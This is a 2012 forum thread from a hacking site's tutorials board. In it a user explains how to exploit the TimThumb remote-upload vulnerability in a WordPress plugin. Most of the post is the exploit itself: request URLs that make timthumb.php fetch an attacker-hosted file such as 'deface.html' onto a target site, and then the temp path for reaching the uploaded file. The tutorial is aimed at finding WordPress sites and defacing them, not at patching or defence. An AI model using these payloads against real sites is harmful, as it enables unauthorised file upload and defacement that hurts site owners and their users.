Sinisterly
Timthumb Remote Upload Vuln in Wordpress - Printable Version

+- Sinisterly (https://sinister.li)
+-- Forum: Hacking (https://sinister.li/Forum-Hacking)
+--- Forum: Tutorials (https://sinister.li/Forum-Tutorials)
+--- Thread: Timthumb Remote Upload Vuln in Wordpress (/Thread-Timthumb-Remote-Upload-Vuln-in-Wordpress)



Timthumb Remote Upload Vuln in Wordpress - #Unkn0wn - 05-18-2012

Hello guys, I'm back with another hacking tutorial for you, This tutorial about "TimThumb" vuln in Wordpress websites.

[Image: wordpress.png]

This bug known as "timthumb.php" exploit

First we need to find website, running on the wordpress platform and exploit is


http://wordpresssite.com/wp-content/plugins/highlighter/libs/timthumb.php?src=http://websiteite.com/anyfile.fileformat

If you need example, Here we go.

http://wordpresssite.com/wp-content/plugins/highlighter/libs/timthumb.php?src=http://www.yourwebsite.com/deface.html

After done with this url that file will remotely upload to that wordpress website. After uploading, Go to below link to access your file

http://wordpresssite.com/wp-content/plugins/highlighter/libs/temp/yourfilehere

(File will upload with a random name like fe051145b78d04cb3345cff7e1b3cf05b77, Check last file to view your file)

If you have any problem, Ask it in here